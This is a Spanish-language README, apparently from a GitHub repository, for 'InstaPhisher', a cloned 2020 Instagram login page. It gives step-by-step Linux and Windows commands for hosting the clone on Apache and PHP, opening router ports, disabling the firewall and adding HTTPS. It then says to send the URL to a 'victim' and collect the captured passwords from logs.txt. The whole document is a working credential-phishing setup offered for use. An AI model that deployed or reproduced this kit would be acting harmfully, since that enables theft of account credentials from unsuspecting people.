2020 Instagram herramienta de phishing usando apache, para cualquier sistema operativo
Este sitio es un clon de la página de inicio de sesión de instagram 2020. Necesitas tener y configurar un DNS (puedes obtener uno gratis aquí: https://www.freenom.com/fr). También debes tener una versión apache válida (https://httpd.apache.org/download.cgi) y PHP (https://www.php.net/downloads).
Tabla de Contenido
Información
Entonces, mueve todos los archivos InstaPhisher a la carpeta apache (“/var/www/html” para linux). Asegúrate de deshabilitar tu firewall y redirigir el puerto 80 (UDP/TCP) de tu router a tu máquina. Si usas Linux, debes conceder permisos de lectura y escritura a los archivos logs.txt y serverMsg.txt cuando sea creado. Después, usa python en una terminal e inicia el archivo InstaPhisher.py. Envía tu url DNS a tu objetivo y espera. Por favor, no modifiques el archivo logs.txt durante este paso. Cuando tu víctima se conecte, se te notificará a través de la terminal. Las contraseñas se guardarán en el archivo logs.txt.
Puedes modificar el enlace de redirección en el archivo login.php. Introduce la url en la función header(), después de ‘Location: ‘ en la línea 21. La redirección por defecto es https://www.instagram.com.
Ejemplo:
- header(“Location: https://www.instagram.com“);
- header(“Location: <redirection_url>”);
También puedes obtener certificados SSL con Let’s Encrypt para beneficiarte de una conexión https. En este caso tendrás que redirigir los puertos 80 y 443 (UDP/TCP) de tu router a tu máquina.
El archivo InstaPhisher sólo se utiliza para notificar cuando se captura una nueva contraseña. Por lo tanto, no es necesario abrirlo, pero se recomienda
Instalar
Linux
git clone https://github.com/ExilasP/InstaPhisher.git
cd InstaPhisher
cp * -r '/var/www/html'
cd /var/www/html
touch logs.txt && touch serverMsg.txt
sudo chmod 777 logs.txt && chmod 777 serverMsg.txt
service apache2 start
python InstaPhisher.pyWindows
Descarga y configuración de Apache y Php
Usar todos los comandos de una terminal como un administrador.
- Descargar apache-2.4
Powershell.exe Invoke-WebRequest -Uri "https://www.apachelounge.com/download/VS16/binaries/httpd-2.4.43-win64-VS16.zip" -OutFile "%userprofile%\Downloads\httpd-2.4.43-win64-VS16.zip"- Extraer el archivo
Powershell.exe Expand-Archive -Path "%userprofile%\Downloads\httpd-2.4.43-win64-VS16.zip" -DestinationPath "%userprofile%\Downloads\httpd-2.4.43-win64-VS16"- Descargar Visual C++ (requerido por apache)
Powershell.exe Invoke-WebRequest -Uri "https://aka.ms/vs/16/release/VC_redist.x64.exe" -OutFile "%userprofile%\Downloads\VC_redist.x64.exe"
start %userprofile%\Downloads\VC_redist.x64.exe- Mover careta apache24 a C:\apache24.
cd %userprofile%\Downloads\httpd-2.4.43-win64-VS16
move /Y %userprofile%\Downloads\httpd-2.4.43-win64-VS16\Apache24 C:\Apache24- Debes modificar Apache24\conf\httpd.conf
- Abre C:/Apache24/httpd.conf con notepad
- line 162: reemplaza”#LoadModule rewrite_module modules/mod_rewrite.so” por “LoadModule rewrite_module modules/mod_rewrite.so”
- Instalar Apache
cd /Apache24/bin
httpd -k install- Descargar php hilo seguro
Powershell.exe Invoke-WebRequest -Uri "https://windows.php.net/downloads/releases/php-7.4.6-Win32-vc15-x64.zip" -OutFile "%userprofile%\Downloads\php-7.4.5RC1-Win32-vc15-x64.zip"- Extraer archivo
Powershell.exe Expand-Archive -Path "%userprofile%\Downloads\php-7.4.5RC1-Win32-vc15-x64.zip" -DestinationPath "%userprofile%\Downloads\php"- Renombrar php.ini-development a php.ini.
Powershell.exe Rename-Item -Path "%userprofile%\Downloads\php\php.ini-development" -NewName "%userprofile%\Downloads\php\php.ini-development"- Mover todos los archivos de la carpeta php-7.4.5RC1-Win32-vc15-x64 a C:\php.
Powershell.exe Move-Item -Path "%userprofile%\Downloads\php" -Destination "C:\"- Abrir C:/Apache24/conf/httpd.conf
- y las siguientes líneas al final:
PHPIniDir "C:/php"
LoadModule php7_module "C:/php/php7apache2_4.dll"
AddHandler application/x-httpd-php .phpDescargar InstaPhisher
- Descarga InstaPhisher, extrae y mueve a la carpeta del servidor apache (apache24\htdocs). PowerShell en el administrador.
Powershell.exe Invoke-WebRequest -Uri "https://github.com/ExilasP/InstaPhisher/archive/master.zip" -OutFile "%userprofile%\Downloads\InstaPhisher.zip"
Powershell.exe Expand-Archive -Path "%userprofile%\Downloads\InstaPhisher.zip" -DestinationPath "%userprofile%\Downloads\InstaPhisher"
Powershell.exe Move-Item -Path "%userprofile%\Downloads\InstaPhisher\InstaPhisher-master\*" -Destination "C:\Apache24\htdocs\"Nota
Requisitos
- Python : https://www.python.org/downloads/
- Apache : https://httpd.apache.org/download.cgi
- Php : https://www.php.net/downloads
- DNS : https://www.freenom.com/
- Linux, Windows o MacOS (más simple con linux)
Usar
Linux:
service apache2 start #"service apache2 stop" for stop
python InstaPhisher.py #Not required but recommendedWindows:
Con CMD con derechos de administrador
cd C:\Apache24\bin
httpd -k start #"httpd -k stop" for stop
C:\Apache24\htdocs\InstaPhisher.pyCaptura de Pantalla
Error: Repositorio no encontrado. Por favor, revisa tu URL.
